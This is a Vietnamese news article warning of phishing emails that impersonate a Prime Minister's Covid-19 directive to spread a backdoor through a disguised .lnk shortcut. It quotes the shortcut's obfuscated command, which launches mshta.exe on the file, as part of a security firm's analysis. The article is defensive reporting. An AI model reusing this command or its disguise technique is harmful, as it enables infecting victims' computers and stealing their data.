Cảnh giác email mạo danh thông báo về dịch Covid-19 để phát tán mã độc
Theo thông tin từ Công ty An ninh mạng CMC, lợi dụng diễn biến của dịch Covid-19, nhiều nhóm hacker (tin tặc) lợi dụng để tấn công có chủ đích vào các tổ chức trên thế giới, trong đó có Việt Nam. Mẫu mã độc được phát tán qua email giả dạng thông báo của Thủ tướng về dịch Covid-19 để đánh lừa người dùng với tiêu đề “Chi thi cua Thu tuong Nguyen Xuan Phuc”.
Cụ thể, theo phân tích của Công ty CMC Cyber Security, file mẫu là một file shortcut có phần mở rộng là ".lnk" được ẩn dưới dạng một file Word nhằm đánh lừa người dùng do đuôi ".lnk" sẽ được hệ điều hành Windows ẩn đi.
![]() |
Mã độc được phát tán qua email giả dạng thông báo của Thủ tướng Chính phủ về dịch Covid-19 |
Tuy nhiên, theo các chuyên gia, file Word này sử dụng một target đáng ngờ. Thông thường target của shorcut thường trỏ đến một thư mục hoặc file đích, nhưng target của mẫu này lại chứa đoạn command có dạng: "%comspec% /c for %x in (%temp%=%cd%) do for /f "delims==" %i in (‘dir "%xChi Thi cua thu tuong nguyen xuan phuc.lnk" /s /b’) do start m%windir:~-1,1%hta.exe "%i" .
Theo các chuyên gia, sau khi lừa người dùng tải về, qua hàng loạt lệnh, mã độc sẽ có thể tạo backdoor (cửa hậu) cho phép kẻ tấn công thực thi lệnh từ xa; hay hỗ trợ nhiều lệnh thực thi khác nhau bao gồm upload file, thư mục, list folder, đọc file, lấy thông tin máy tính, thông tin người dùng…
Hiện tượng lợi dụng các nội dung, thông tin nhạy cảm để phát tán mã độc đã, đang diễn ra hàng ngày không chỉ riêng các thông tin về Covid-19 mà còn nhiều thông tin khác. Nếu người dùng không cẩn thận khi click, mở các file chứa mã độc, người dùng có thể bị mất các thông tin cá nhân, ngoài ra các hacker có thể lợi dụng tài khoản lấy được của người dùng để lan truyền tin tức giả, phát tán mã độc.
Để không bị hacker lừa phát tán mã độc trong bối cảnh tin giả về dịch Covid-19 đang xuất hiện nhiều trên mạng như hiện nay, các chuyên gia bảo mật khuyên người dùng cần cảnh giác cao khi tham gia vào thế giới online trên không gian mạng, chỉ đọc các thông tin từ nguồn chính thống của Bộ Y tế, Chính phủ; không mở email hay click vào link lạ; không mở các file được gửi từ nguồn không rõ ràng; thường xuyên cập nhật các bản vá bảo mật cho thiết bị cá nhân; và không chia sẻ các thông tin không chính thống trên mạng xã hội.
TQ
- 20 ca nhiễm mới, 1 trường hợp tử vong do Covid-19
- Phát hiện 1 trường hợp nhập cảnh trái phép nhiễm Covid-9
- Bệnh nhân thứ 16 tử vong do Covid-19
- Phụ huynh Hà Nội "thở phào" khi con được đến trường
- Đẩy mạnh việc cài đặt ứng dụng Bluezone phục vụ giám sát, truy vết tiếp xúc dịch Covid-19
- Một số kỹ năng ứng xử khi tham gia môi trường mạng
- Hơn 27 triệu lượt tải ứng dụng Bluezone
- Hà Nội: Yêu cầu công chức, viên chức, người lao động cài đặt ứng dụng BlueZone
- Thông tin "phong toả Hà Nội do Covid-19" là giả
- Đăng ký: Email công ty bảo mật
- Xem ngay: mmgroup.vn Giải pháp email
- Viettimes tin tức kinh tế mới nhất